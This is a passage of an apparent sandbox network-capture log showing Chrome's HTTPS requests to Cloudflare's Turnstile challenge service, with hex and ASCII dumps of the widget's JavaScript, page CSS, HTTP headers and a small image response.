                                      2024-03-22 14:23:52 UTC1369INData Raw: 72 6e 20 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 7d 2c 65 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 55 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 52 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 3d 6e 75 6c 6c 7c 7c 21 55 74 28 61 29 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74
                                      Data Ascii: rn t.__proto__||Object.getPrototypeOf(t)},ee(e)}function Ut(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Re(e){var r=typeof Map=="function"?new Map:void 0;return Re=function(a){if(a===null||!Ut(a))return a;if(typeof a!="funct
                                      2024-03-22 14:23:52 UTC1369INData Raw: 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 61 3d 30 2c 75 3b 75 3d 74 5b 61 5d 3b 61 2b 2b 29 69 66 28 6b 28 75 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 75 2e 73 72 63 29 29 72 65 74 75 72 6e 20 75 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 29 7b 76 61 72 20 65 3d 74 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c
                                      Data Ascii: MLScriptElement)&&e.test(r.src))return r;for(var t=document.querySelectorAll("script"),a=0,u;u=t[a];a++)if(k(u,HTMLScriptElement)&&e.test(u.src))return u}function Bt(){var e=tt();e||v("Could not find Turnstile script tag, some features may not be availabl
                                      2024-03-22 14:23:52 UTC1369INData Raw: 6f 67 28 22 54 75 72 6e 73 74 69 6c 65 20 57 69 64 67 65 74 20 73 65 65 6d 20 74 6f 20 68 61 76 65 20 63 72 61 73 68 65 64 3a 20 22 2c 6d 29 3b 76 61 72 20 6c 3b 69 66 28 28 53 3d 65 2e 6d 73 67 48 61 6e 64 6c 65 72 29 3d 3d 3d 6e 75 6c 6c 7c 7c 53 3d 3d 3d 76 6f 69 64 20 30 7c 7c 53 2e 63 61 6c 6c 28 65 2c 7b 64 61 74 61 3a 7b 73 6f 75 72 63 65 3a 4d 2c 77 69 64 67 65 74 49 64 3a 6d 2c 63 6f 64 65 3a 53 65 2c 65 76 65 6e 74 3a 22 66 61 69 6c 22 2c 72 63 56 3a 28 6c 3d 66 2e 72 63 56 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 57 7d 7d 29 2c 72 29 7b 76 61 72 20 6f 3b 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 73 6f 75 72 63 65 3a 4d 2c 77 69 64 67 65 74 49 64 3a 6d 2c 65 76 65 6e 74 3a 22 72 63 76 2d 75 70 64 61
                                      Data Ascii: og("Turnstile Widget seem to have crashed: ",m);var l;if((S=e.msgHandler)===null||S===void 0||S.call(e,{data:{source:M,widgetId:m,code:Se,event:"fail",rcV:(l=f.rcV)!==null&&l!==void 0?l:W}}),r){var o;window.postMessage({source:M,widgetId:m,event:"rcv-upda
                                      2024-03-22 14:23:52 UTC1369INData Raw: 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 6d 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 66 29 7d 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 29 7b 76 61 72 20 74 3b 72 2e 75 70 67 72 61 64 65 41 74 74 65 6d 70 74 73 2b 2b 3b 76 61 72 20 61 3d 74 74 28 29 3b 69 66 28 21 28 21 61 7c 7c 21 61 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 7b 76 61 72 20 75 3d 61 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 61 2e 6e 6f 6e 63
                                      Data Ascii: gi/challenge-platform/").concat(m,"turnstile/if/ov2/av0/rcv").concat(a,"/").concat(e,"/").concat(r,"/").concat(t.theme,"/").concat(t.size).concat(f)}function Vt(e,r){var t;r.upgradeAttempts++;var a=tt();if(!(!a||!a.parentNode)){var u=a==null?void 0:a.nonc
                                      2024-03-22 14:23:52 UTC1369INData Raw: 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 4e 6f 64 65 49 74 65 72 61 74 6f 72 28 65 2c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 45 4c 45 4d 45 4e 54 7c 4e 6f 64 65 46 69 6c 74 65 72 2e 53 48 4f 57 5f 54 45 58 54 2c 7b 61 63 63 65 70 74 4e 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 54 29 7b 72 65 74 75 72 6e 20 75 3e 72 7c 7c 61 2e 6c 65 6e 67 74 68 3e 74 3f 4e 6f 64 65 46 69 6c 74 65 72 2e 46 49 4c 54 45 52 5f 52 45 4a 45 43 54 3a 4e 6f 64 65 46 69 6c 74 65 72 2e 46 49 4c 54 45 52 5f 41 43 43 45 50 54 7d 7d 29 2c 67 3b 28 67 3d 73 2e 6e 65 78 74 4e 6f 64 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 61 2e 6c 65 6e 67 74 68 3c 74 3b 29 7b 69 66 28 67 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 4e 6f 64 65 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 29 7b 76 61 72 20
                                      Data Ascii: =document.createNodeIterator(e,NodeFilter.SHOW_ELEMENT|NodeFilter.SHOW_TEXT,{acceptNode:function(T){return u>r||a.length>t?NodeFilter.FILTER_REJECT:NodeFilter.FILTER_ACCEPT}}),g;(g=s.nextNode())!==null&&a.length<t;){if(g.nodeType===Node.ELEMENT_NODE){var


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449746104.17.3.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:53 UTC818OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:53 UTC1343INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:53 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                      cross-origin-embedder-policy: require-corp
                                      cross-origin-opener-policy: same-origin
                                      cross-origin-resource-policy: cross-origin
                                      document-policy: js-profiling
                                      origin-agent-cluster: ?1
                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                      2024-03-22 14:23:53 UTC112INData Raw: 72 65 66 65 72 72 65 72 2d 70 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 36 38 36 64 37 39 36 39 66 66 33 38 63 38 64 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                      Data Ascii: referrer-policy: same-originServer: cloudflareCF-RAY: 8686d7969ff38c8d-EWRalt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:53 UTC1283INData Raw: 37 61 30 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c
                                      Data Ascii: 7a03<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scal
                                      2024-03-22 14:23:53 UTC1369INData Raw: 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69
                                      Data Ascii: ng: 0; width: 100%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, bli
                                      2024-03-22 14:23:53 UTC1369INData Raw: 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b
                                      Data Ascii: f8f8f8; stroke-miterlimit: 10;}#success-icon { display: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both;
                                      2024-03-22 14:23:53 UTC1369INData Raw: 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f
                                      Data Ascii: hallenge-overlay a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .ctp-checkbox-label .mark { border: 2px solid #dadada; backgro
                                      2024-03-22 14:23:53 UTC1369INData Raw: 61 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 65 72 6d 73 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65
                                      Data Ascii: a:active, .theme-dark #terms a:focus { color: #949494;}.theme-dark #content { border-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme
                                      2024-03-22 14:23:53 UTC1369INData Raw: 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 2c 20 23 63 68 61 6c
                                      Data Ascii: ay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:visited,#challenge-error-text a:link { color: #1d1f20;}#challenge-overlay a:active, #challenge-overlay a:hover, #chal
                                      2024-03-22 14:23:53 UTC1369INData Raw: 73 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d
                                      Data Ascii: s ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label input:focus ~ span.ctp-label { text-decoration: underline;}.ctp-checkbox-label input:checked ~ .mark { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; background-
                                      2024-03-22 14:23:53 UTC1369INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70
                                      Data Ascii: margin-bottom: 0; height: 22px;}.size-compact .cb-container { margin-top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16p
                                      2024-03-22 14:23:53 UTC1369INData Raw: 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63
                                      Data Ascii: ; width: 90px; text-align: center;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-c


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.449747104.17.3.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:53 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:53 UTC248INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:53 GMT
                                      Content-Type: image/png
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cache-control: max-age=2629800, public
                                      Server: cloudflare
                                      CF-RAY: 8686d799993042a1-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:53 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                      Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                      2024-03-22 14:23:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.449748104.17.3.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:54 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8686d7969ff38c8d HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normal
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:54 UTC335INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:54 GMT
                                      Content-Type: application/javascript; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Server: cloudflare
                                      CF-RAY: 8686d79c5b400c80-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:54 UTC1034INData Raw: 37 65 36 33 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 6a 6f 2c 67 35 2c 67 36 2c 67 37 2c 67 62 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c
